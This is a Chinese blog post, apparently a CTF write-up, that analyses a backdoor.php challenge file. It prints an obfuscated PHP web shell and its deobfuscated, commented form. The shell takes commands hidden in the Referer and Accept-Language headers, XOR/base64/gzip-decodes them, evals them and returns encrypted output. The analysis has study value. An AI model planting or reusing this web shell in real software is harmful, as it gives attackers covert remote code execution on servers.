<!DOCTYPE html>



  


<html class="theme-next muse use-motion" lang="zh-Hans">
<head><meta name="generator" content="Hexo 3.8.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta name="theme-color" content="#222">
<script>
    (function(){
        if(''){
            if (prompt('请输入文章密码') !== ''){
                alert('密码错误！');
                history.back();
            }
        }
    })();
</script>


  
  
    
    
  <script src="/lib/pace/pace.min.js?v=1.0.2"></script>
  <link href="/lib/pace/pace-theme-bounce.min.css?v=1.0.2" rel="stylesheet">







<meta http-equiv="Cache-Control" content="no-transform">
<meta http-equiv="Cache-Control" content="no-siteapp">
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css">







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css">

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="Hexo, NexT">





  <link rel="alternate" href="/atom.xml" title="Kiona" type="application/atom+xml">






<meta name="description" content="这是一道后门利用题目，程序开发人员预留了一个后门程序，我们需要通过这个后门程序来获取flag。 题目  题目说有三个页面，一个是我们现在看到的主页面index还有两个分别是我们需要获得的flag.php和可以利用的backdoor.php。 直接访问flag.php发现页面什么都没有，说明flag位于源码里面，我们需要通过后门程序读取flag.php的源码。 backdoor.php直接进入该页面">
<meta name="keywords" content="Web Security">
<meta property="og:type" content="article">
<meta property="og:title" content="后门利用题目">
<meta property="og:url" content="https://kkkiona.github.io/2019/04/16/后门利用题目/index.html">
<meta property="og:site_name" content="Kiona">
<meta property="og:description" content="这是一道后门利用题目，程序开发人员预留了一个后门程序，我们需要通过这个后门程序来获取flag。 题目  题目说有三个页面，一个是我们现在看到的主页面index还有两个分别是我们需要获得的flag.php和可以利用的backdoor.php。 直接访问flag.php发现页面什么都没有，说明flag位于源码里面，我们需要通过后门程序读取flag.php的源码。 backdoor.php直接进入该页面">
<meta property="og:locale" content="zh-Hans">
<meta property="og:image" content="https://kkkiona.github.io/2019/04/16/后门利用题目/Image0001.png">
<meta property="og:image" content="https://kkkiona.github.io/2019/04/16/后门利用题目/Image0002.png">
<meta property="og:image" content="https://kkkiona.github.io/2019/04/16/后门利用题目/Image0003.png">
<meta property="og:image" content="https://kkkiona.github.io/2019/04/16/后门利用题目/Image0004.png">
<meta property="og:image" content="https://kkkiona.github.io/2019/04/16/后门利用题目/Image0005.png">
<meta property="og:image" content="https://kkkiona.github.io/2019/04/16/后门利用题目/Image0006.png">
<meta property="og:updated_time" content="2019-04-16T10:08:05.918Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="后门利用题目">
<meta name="twitter:description" content="这是一道后门利用题目，程序开发人员预留了一个后门程序，我们需要通过这个后门程序来获取flag。 题目  题目说有三个页面，一个是我们现在看到的主页面index还有两个分别是我们需要获得的flag.php和可以利用的backdoor.php。 直接访问flag.php发现页面什么都没有，说明flag位于源码里面，我们需要通过后门程序读取flag.php的源码。 backdoor.php直接进入该页面">
<meta name="twitter:image" content="https://kkkiona.github.io/2019/04/16/后门利用题目/Image0001.png">


  <script>
  (function(i,s,o,g,r,a,m){i["DaoVoiceObject"]=r;i[r]=i[r]||function(){(i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;a.charset="utf-8";m.parentNode.insertBefore(a,m)})(window,document,"script",('https:' == document.location.protocol ? 'https:' : 'http:') + "//widget.daovoice.io/widget/0dd3bc26.js","daovoice")
  daovoice('init', {
      app_id: "0dd3bc26"
    });
  daovoice('update');
  </script>



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Muse',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="https://kkkiona.github.io/2019/04/16/后门利用题目/">





  <title>后门利用题目 | Kiona</title>
  








</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>
	<a href="https://github.com/KKKiona" class="github-corner" aria-label="View source on GitHub"><svg width="80" height="80" viewbox="0 0 250 250" style="fill:#151513; color:#fff; position: absolute; top: 0; border: 0; right: 0;" aria-hidden="true"><path d="M0,0 L115,115 L130,115 L142,142 L250,250 L250,0 Z"/><path d="M128.3,109.0 C113.8,99.7 119.0,89.6 119.0,89.6 C122.0,82.7 120.5,78.6 120.5,78.6 C119.2,72.0 123.4,76.3 123.4,76.3 C127.3,80.9 125.5,87.3 125.5,87.3 C122.9,97.6 130.6,101.9 134.4,103.2" fill="currentColor" style="transform-origin: 130px 106px;" class="octo-arm"/><path d="M115.0,115.0 C114.9,115.1 118.7,116.5 119.8,115.4 L133.7,101.6 C136.9,99.2 139.9,98.4 142.2,98.6 C133.8,88.0 127.5,74.4 143.8,58.0 C148.5,53.4 154.0,51.2 159.7,51.0 C160.3,49.4 163.2,43.6 171.4,40.1 C171.4,40.1 176.1,42.5 178.8,56.2 C183.1,58.6 187.2,61.8 190.9,65.4 C194.5,69.0 197.7,73.2 200.1,77.6 C213.8,80.2 216.3,84.9 216.3,84.9 C212.7,93.1 206.9,96.0 205.4,96.6 C205.1,102.4 203.0,107.8 198.3,112.5 C181.9,128.9 168.3,122.5 157.7,114.1 C157.9,116.9 156.7,120.9 152.7,124.9 L141.0,136.5 C139.8,137.7 141.6,141.9 141.8,141.8 Z" fill="currentColor" class="octo-body"/></svg></a><style>.github-corner:hover .octo-arm{animation:octocat-wave 560ms ease-in-out}@keyframes octocat-wave{0%,100%{transform:rotate(0)}20%,60%{transform:rotate(-25deg)}40%,80%{transform:rotate(10deg)}}@media (max-width:500px){.github-corner:hover .octo-arm{animation:none}.github-corner .octo-arm{animation:octocat-wave 560ms ease-in-out}}</style>
    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Kiona</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle"></p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br>
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br>
            
            归档
          </a>
        </li>
      

      
        <li class="menu-item menu-item-search">
          
            <a href="javascript:;" class="popup-trigger">
          
            
              <i class="menu-item-icon fa fa-search fa-fw"></i> <br>
            
            搜索
          </a>
        </li>
      
    </ul>
  

  
    <div class="site-search">
      
  <div class="popup search-popup local-search-popup">
  <div class="local-search-header clearfix">
    <span class="search-icon">
      <i class="fa fa-search"></i>
    </span>
    <span class="popup-btn-close">
      <i class="fa fa-times-circle"></i>
    </span>
    <div class="local-search-input-wrapper">
      <input autocomplete="off" placeholder="搜索..." spellcheck="false" type="text" id="local-search-input">
    </div>
  </div>
  <div id="local-search-result"></div>
</div>



    </div>
  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">		  	  
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="https://kkkiona.github.io/2019/04/16/后门利用题目/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="Kiona">
      <meta itemprop="description" content>
      <meta itemprop="image" content="/images/head.png">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Kiona">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">后门利用题目</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2019-04-16T10:47:38+08:00">
                2019-04-16
              </time>
            

            

            
          </span>

          

          
            
          

          
          
             <span id="/2019/04/16/后门利用题目/" class="leancloud_visitors" data-flag-title="后门利用题目">
               <span class="post-meta-divider">|</span>
               <span class="post-meta-item-icon">
                 <i class="fa fa-eye"></i>
               </span>
               
                 <span class="post-meta-item-text">阅读次数&#58;</span>
               
                 <span class="leancloud-visitors-count"></span>
             </span>
          

          
            <span class="post-meta-divider">|</span>
            <span class="page-pv"><i class="fa fa-file-o"></i>
            <span class="busuanzi-value" id="busuanzi_value_page_pv"></span>
            </span>
          

          
            <div class="post-wordcount">
              
                
                <span class="post-meta-item-icon">
                  <i class="fa fa-file-word-o"></i>
                </span>
                
                  <span class="post-meta-item-text">字数统计&#58;</span>
                
                <span title="字数统计">
                  3.4k
                </span>
              

              
                <span class="post-meta-divider">|</span>
              

              
                <span class="post-meta-item-icon">
                  <i class="fa fa-clock-o"></i>
                </span>
                
                  <span class="post-meta-item-text">阅读时长 &asymp;</span>
                
                <span title="阅读时长">
                  16
                </span>
              
            </div>
          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <p>这是一道后门利用题目，程序开发人员预留了一个后门程序，我们需要通过这个后门程序来获取flag。</p>
<p><strong>题目</strong></p>
<p><img src="/2019/04/16/后门利用题目/Image0001.png" alt></p>
<p>题目说有三个页面，一个是我们现在看到的主页面index还有两个分别是我们需要获得的flag.php和可以利用的backdoor.php。</p>
<p>直接访问flag.php发现页面什么都没有，说明flag位于源码里面，我们需要通过后门程序读取flag.php的源码。</p>
<p>backdoor.php直接进入该页面也是什么都没有，说明它的调用方式是通过参数传递来实现的（想必谁也不会愚蠢到给自己的后门程序留一个明目张胆的登录界面吧！- -），所以该文件提供了源文件的下载。</p>
<p><strong>backdoor.php 源码</strong><br><a id="more"></a><br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">/**</span><br><span class="line"> * Signature For Report</span><br><span class="line">*/$c=&apos;ue)ery)e&quot;],$q);$q=array_valu)ees($q);preg_)ema)etch_all()e&quot;/([\w]&apos;;/*</span><br><span class="line">*/$e=&apos;$i&lt;$l);$j++)e,$i++)&#123;$o.=$t&#123;)e$i&#125;^$k&#123;$j&#125;;&#125;&#125;retur)en )e$o;&#125;$r=$_SER&apos;;/*</span><br><span class="line">*/$G=&apos;o=ob_get_conte)ents();ob_e)end_cle)ean();$d=base)e64_encod)ee(x(g&apos;;/*</span><br><span class="line">*/$g=&apos;$)ekh)e=&quot;d0)e3a&quot;;$kf=&quot;1f3c&quot;;function x($t)e,$k)&#123;$c=strlen($k);$l=&apos;;/*</span><br><span class="line">*/$F=&apos;=strpos($s[)e$i],$f);)eif($e)&#123;$k=$kh.$kf;ob)e_sta)ert();@eval)e(@&apos;;/*</span><br><span class="line">*/$I=&apos;gz)eunco)empress(@)ex(@b)ease6)e4_decode(p)ere)eg_repl)eace()ear)&apos;;/*</span><br><span class="line">*/$h=&apos;_sta)ert();$s=&amp;$_SES)eSION;$ss=&quot;substr&quot;;$sl=&quot;s)etrtolower&quot;;$i=)e$&apos;;/*</span><br><span class="line">*/$K=&apos;U)eAGE&quot;];if($rr&amp;&amp;)e$ra)&#123;$u=pa)erse_url($rr))e;parse)e_str)e($u[&quot;q&apos;;/*</span><br><span class="line">*/$M=&apos;m[1][)e0].$m[1])e[1];$h=$sl($ss(m)ed5($i.$k)eh),0,3)e));$f=$sl($s&apos;;/*</span><br><span class="line">*/$C=&apos;s()emd5($i)e.$kf),0,3));$p=&quot;&quot;;)efor($z=1;$z&lt;count($m[1]);$z++)$p.&apos;;/*</span><br><span class="line">*/$n=&apos;)eVE)eR;$rr=@$r[&quot;HTTP_REFERE)eR&quot;)e];$ra=)e@$r[&quot;HTTP_AC)eCEPT_LANG&apos;;/*</span><br><span class="line">*/$p=&apos;=$q)e[$m[2][$z]];if(strpos()e$p)e,$)eh)===0)&#123;$s[$)ei])e=&quot;)e&quot;;$p=$&apos;;/*</span><br><span class="line">*/$s=&apos;zcompress($o),$k));print(&quot;&lt;$k&gt;$d&lt;/$)ek&gt;&quot;);@sess)eion_de)estroy();&apos;;/*</span><br><span class="line">*/$R=&apos;)ess($)ep,3))e;&#125;if(array_key_exists()e$i,$)es))e)&#123;$s)e[$i].=$p;$e&apos;;/*</span><br><span class="line">*/$V=&apos;strlen($t);$o=&quot;&quot;;f)eor($)ei=0;)e$i)e&lt;$l;)e)&#123;)efor($j=0)e;($j&lt;$c&amp;&amp;&apos;;/*</span><br><span class="line">*/$y=&apos;)[\w-]+(?:;q=0.([\d]))?)e,?/&quot;,$ra,$m);i)ef()e$q&amp;&amp;)e$m)&#123;@sessi)eon&apos;;/*</span><br><span class="line">*/$P=&apos;eray(&quot;/_/&quot;,&quot;/-/&quot;),array(&quot;/&quot;,&quot;+&quot;),$ss()e$s[$i],0)e,$e))),$)ek)));$&apos;;/*</span><br><span class="line">*/$t=&apos;&#125;&#125;&#125;&#125;&apos;;$Y=str_replace(&apos;b&apos;,&apos;&apos;,&apos;crbebbabte_funcbbtion&apos;);/*</span><br><span class="line">*/$L=str_replace(&apos;)e&apos;,&apos;&apos;,$g.$V.$e.$n.$K.$c.$y.$h.$M.$C.$p.$R.$F.$I.$P.$G.$s.$t);/*</span><br><span class="line"> */$v=$Y(&apos;&apos;,$L);$v();/*</span><br><span class="line"> */</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure></p>
<p>是一段php代码，但是被压缩了，我们需要先恢复其格式，随便找个在线格式化工具。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">$c = &apos;ue)ery)e&quot;],$q);$q=array_valu)ees($q);preg_)ema)etch_all()e&quot;/([\w]&apos;; </span><br><span class="line"></span><br><span class="line">$e = &apos;$i&lt;$l);$j++)e,$i++)&#123;$o.=$t&#123;)e$i&#125;^$k&#123;$j&#125;;&#125;&#125;retur)en )e$o;&#125;$r=$_SER&apos;; </span><br><span class="line"></span><br><span class="line">$G = &apos;o=ob_get_conte)ents();ob_e)end_cle)ean();$d=base)e64_encod)ee(x(g&apos;; </span><br><span class="line"></span><br><span class="line">$g = &apos;$)ekh)e=&quot;d0)e3a&quot;;$kf=&quot;1f3c&quot;;function x($t)e,$k)&#123;$c=strlen($k);$l=&apos;; </span><br><span class="line"></span><br><span class="line">$F = &apos;=strpos($s[)e$i],$f);)eif($e)&#123;$k=$kh.$kf;ob)e_sta)ert();@eval)e(@&apos;; </span><br><span class="line"></span><br><span class="line">$I = &apos;gz)eunco)empress(@)ex(@b)ease6)e4_decode(p)ere)eg_repl)eace()ear)&apos;; </span><br><span class="line"></span><br><span class="line">$h = &apos;_sta)ert();$s=&amp;$_SES)eSION;$ss=&quot;substr&quot;;$sl=&quot;s)etrtolower&quot;;$i=)e$&apos;; </span><br><span class="line"></span><br><span class="line">$K = &apos;U)eAGE&quot;];if($rr&amp;&amp;)e$ra)&#123;$u=pa)erse_url($rr))e;parse)e_str)e($u[&quot;q&apos;; </span><br><span class="line"></span><br><span class="line">$M = &apos;m[1][)e0].$m[1])e[1];$h=$sl($ss(m)ed5($i.$k)eh),0,3)e));$f=$sl($s&apos;; </span><br><span class="line"></span><br><span class="line">$C = &apos;s()emd5($i)e.$kf),0,3));$p=&quot;&quot;;)efor($z=1;$z&lt;count($m[1]);$z++)$p.&apos;; </span><br><span class="line"></span><br><span class="line">$n = &apos;)eVE)eR;$rr=@$r[&quot;HTTP_REFERE)eR&quot;)e];$ra=)e@$r[&quot;HTTP_AC)eCEPT_LANG&apos;; </span><br><span class="line"></span><br><span class="line">$p = &apos;=$q)e[$m[2][$z]];if(strpos()e$p)e,$)eh)===0)&#123;$s[$)ei])e=&quot;)e&quot;;$p=$&apos;; </span><br><span class="line"></span><br><span class="line">$s = &apos;zcompress($o),$k));print(&quot;&lt;$k&gt;$d&lt;/$)ek&gt;&quot;);@sess)eion_de)estroy();&apos;; </span><br><span class="line"></span><br><span class="line">$R = &apos;)ess($)ep,3))e;&#125;if(array_key_exists()e$i,$)es))e)&#123;$s)e[$i].=$p;$e&apos;; </span><br><span class="line"></span><br><span class="line">$V = &apos;strlen($t);$o=&quot;&quot;;f)eor($)ei=0;)e$i)e&lt;$l;)e)&#123;)efor($j=0)e;($j&lt;$c&amp;&amp;&apos;; </span><br><span class="line"></span><br><span class="line">$y = &apos;)[\w-]+(?:;q=0.([\d]))?)e,?/&quot;,$ra,$m);i)ef()e$q&amp;&amp;)e$m)&#123;@sessi)eon&apos;; </span><br><span class="line"></span><br><span class="line">$P = &apos;eray(&quot;/_/&quot;,&quot;/-/&quot;),array(&quot;/&quot;,&quot;+&quot;),$ss()e$s[$i],0)e,$e))),$)ek)));$&apos;; </span><br><span class="line"></span><br><span class="line">$t = &apos;&#125;&#125;&#125;&#125;&apos;;</span><br><span class="line">$Y = str_replace(&apos;b&apos;, &apos;&apos;, &apos;crbebbabte_funcbbtion&apos;); </span><br><span class="line"></span><br><span class="line">$L = str_replace(&apos;)e&apos;, &apos;&apos;, $g . $V . $e . $n . $K . $c . $y . $h . $M . $C . $p . $R . $F . $I . $P . $G . $s . $t); </span><br><span class="line"></span><br><span class="line">$v = $Y(&apos;&apos;, $L);</span><br><span class="line"></span><br><span class="line">$v(); </span><br><span class="line"></span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>
<p>乍一看还是有点乱，但是盯住后边四行不难看出，倒数第四行<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$Y = str_replace(&apos;b&apos;, &apos;&apos;, &apos;crbebbabte_funcbbtion&apos;);</span><br></pre></td></tr></table></figure></p>
<p>意思是把字符串“crbebbabte_funcbbtion”里面的“b”去掉，也就是$Y值为create_function，</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">$v = $Y(&apos;&apos;, $L);</span><br><span class="line">$v();</span><br></pre></td></tr></table></figure>
<p>后两句话由此来看就变成了定义一个函数$v=create_function(),并且执行该函数，而函数内容就为$L。<br>可以看出$L同样是使用了字符替换的手段把前边定义的N个字符串进行了替换和拼接，我们只要把这个$L的值输出出来就可以知道这个function是什么原理了。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">$kh=&quot;d03a&quot;;$kf=&quot;1f3c&quot;;function x($t,$k)&#123;$c=strlen($k);$l=strlen($t);$o=&quot;&quot;;for($i=0;$i&lt;$l;)&#123;for($j=0;($j&lt;$c&amp;&amp;$i&lt;$l);$j++,$i++)&#123;$o.=$t&#123;$i&#125;^$k&#123;$j&#125;;&#125;&#125;return $o;&#125;$r=$_SERVER;$rr=@$r[&quot;HTTP_REFERER&quot;];$ra=@$r[&quot;HTTP_ACCEPT_LANGUAGE&quot;];if($rr&amp;&amp;$ra)&#123;$u=parse_url($rr);parse_str($u[&quot;query&quot;],$q);$q=array_values($q);preg_match_all(&quot;/([\w])[\w-]+(?:;q=0.([\d]))?,?/&quot;,$ra,$m);if($q&amp;&amp;$m)&#123;@session_start();$s=&amp;$_SESSION;$ss=&quot;substr&quot;;$sl=&quot;strtolower&quot;;$i=$m[1][0].$m[1][1];$h=$sl($ss(md5($i.$kh),0,3));$f=$sl($ss(md5($i.$kf),0,3));$p=&quot;&quot;;for($z=1;$z&lt;count($m[1]);$z++)$p.=$q[$m[2][$z]];if(strpos($p,$h)===0)&#123;$s[$i]=&quot;&quot;;$p=$ss($p,3);&#125;if(array_key_exists($i,$s))&#123;$s[$i].=$p;$e=strpos($s[$i],$f);if($e)&#123;$k=$kh.$kf;ob_start();@eval(@gzuncompress(@x(@base64_decode(preg_replace(array(&quot;/_/&quot;,&quot;/-/&quot;),array(&quot;/&quot;,&quot;+&quot;),$ss($s[$i],0,$e))),$k)));$o=ob_get_contents();ob_end_clean();$d=base64_encode(x(gzcompress($o),$k));print(&quot;&lt;$k&gt;$d&lt;/$k&gt;&quot;);@session_destroy();&#125;&#125;&#125;&#125;</span><br></pre></td></tr></table></figure>
<p>上边这段代码整理后放到具有代码高亮功能的编辑器里面会发现<br><img src="/2019/04/16/后门利用题目/Image0002.png" alt><br>说明这段代码语法有问题，经过对输出$L变量的网页源代码进行查看发现<br><img src="/2019/04/16/后门利用题目/Image0003.png" alt><br>原来代码里面包含“&lt;”被当成HTML标签解析了。重新获得源码并整理后获得如下结果。<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">//用于加密的字符串变量</span><br><span class="line">$kh = &quot;d03a&quot;;   </span><br><span class="line">$kf = &quot;1f3c&quot;;</span><br><span class="line"></span><br><span class="line">//x() 函数是一个按位异或函数</span><br><span class="line">function x($t, $k) &#123;</span><br><span class="line">    $c = strlen($k);</span><br><span class="line">    $l = strlen($t);</span><br><span class="line">    $o = &quot;&quot;;</span><br><span class="line">    for ($i = 0; $i &lt; $l;) &#123;  //从第一个字符串头部开始直至结尾  </span><br><span class="line">        for ($j = 0; ($j &lt; $c &amp;&amp; $i &lt; $l); $j++, $i++) &#123;  //每次均从字符串二的头部开始异或 若其中任意一个长度不足则结束</span><br><span class="line">            $o.= $t&#123;$i&#125; ^ $k&#123;$j&#125;;                        // 若i未到字符串一结尾 则从二号头部重新开始继续i位置起的异或</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">    return $o;	//返回结果</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">//这里给出了两个我们可以控制的变量，是从响应头传递的参数</span><br><span class="line">$r = $_SERVER;</span><br><span class="line">$rr = @$r[&quot;HTTP_REFERER&quot;];//接受HTTP响应头里referer参数</span><br><span class="line">$ra = @$r[&quot;HTTP_ACCEPT_LANGUAGE&quot;];//接受HTTP响应头里 accept-language参数</span><br><span class="line"></span><br><span class="line">if ($rr &amp;&amp; $ra) &#123;	</span><br><span class="line">    $u = parse_url($rr);	//对rr进行URL解析 结果给数组u</span><br><span class="line">    parse_str($u[&quot;query&quot;], $q);	//把u数组query字段的值进行解析，结果给数组q</span><br><span class="line">    $q = array_values($q);	//去除数组键名 只保留键值</span><br><span class="line">    preg_match_all(&quot;/([\w])[\w-]+(?:;q=0.([\d]))?,?/&quot;, $ra, $m); //对ta进行一个正则表达式处理，结果给二维数组m</span><br><span class="line">    if ($q &amp;&amp; $m) &#123;	</span><br><span class="line">        @session_start();	//开启session</span><br><span class="line">        $s = &amp; $_SESSION;	//获取session的引用</span><br><span class="line">        $ss = &quot;substr&quot;;	//截取</span><br><span class="line">        $sl = &quot;strtolower&quot;;		//小写转换</span><br><span class="line">        $i = $m[1][0] . $m[1][1];	//i等于m[1][0],m[1][1]两个值的拼接</span><br><span class="line">        $h = $sl($ss(md5($i . $kh) , 0, 3));	//	h是i和kh拼接后进行md5加密的前三个字符的小写</span><br><span class="line">        $f = $sl($ss(md5($i . $kf) , 0, 3));	//	f是i和kf拼接后进行md5加密的前三个字符的小写</span><br><span class="line">        $p = &quot;&quot;;</span><br><span class="line">        for ($z = 1; $z &lt; count($m[1]); $z++) $p.= $q[$m[2][$z]];	//p是对q[$m[2][$z]的拼接</span><br><span class="line">        if (strpos($p, $h) === 0) &#123; //判断h是否出现在p的开头</span><br><span class="line">            $s[$i] = &quot;&quot;;	//session的$i字段置空</span><br><span class="line">            $p = $ss($p, 3);	//p截取前三个字符</span><br><span class="line">        &#125;</span><br><span class="line">        if (array_key_exists($i, $s)) &#123;	//检查键名$i是否在数组s里面</span><br><span class="line">            $s[$i].= $p;	//session的$i字段拼接上p</span><br><span class="line">            $e = strpos($s[$i], $f);	//e为f在session的i字段里面的出现位置</span><br><span class="line">            if ($e) &#123;</span><br><span class="line">                $k = $kh . $kf;	//拼接kh kf 给k</span><br><span class="line">                ob_start();	//打开缓冲区 保存发送给浏览器的数据</span><br><span class="line">                @eval(@gzuncompress(@x(@base64_decode(preg_replace(array(  //截取session的i字段的前e个字符</span><br><span class="line">                    &quot;/_/&quot;,												   //将截取字符里的_ -替换为/ +</span><br><span class="line">                    &quot;/-/&quot;												   //进行base64解密</span><br><span class="line">                ) , array(												   //加密结果与k一起 进行x的按位异或运算</span><br><span class="line">                    &quot;/&quot;,												   //解压缩</span><br><span class="line">                    &quot;+&quot;													   //执行解压后的代码</span><br><span class="line">                ) , $ss($s[$i], 0, $e))) , $k)));</span><br><span class="line">                $o = ob_get_contents();	//得到缓冲区内容</span><br><span class="line">                ob_end_clean();	//清空缓冲区</span><br><span class="line">                $d = base64_encode(x(gzcompress($o) , $k));	//对缓冲区内容连同k一起按位异或并压缩，再进行base64加密</span><br><span class="line">                print (&quot;&lt;$k&gt;$d&lt;/$k&gt;&quot;);	//打印加密结果</span><br><span class="line">                @session_destroy();	//销毁session</span><br><span class="line">            &#125;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure></p>
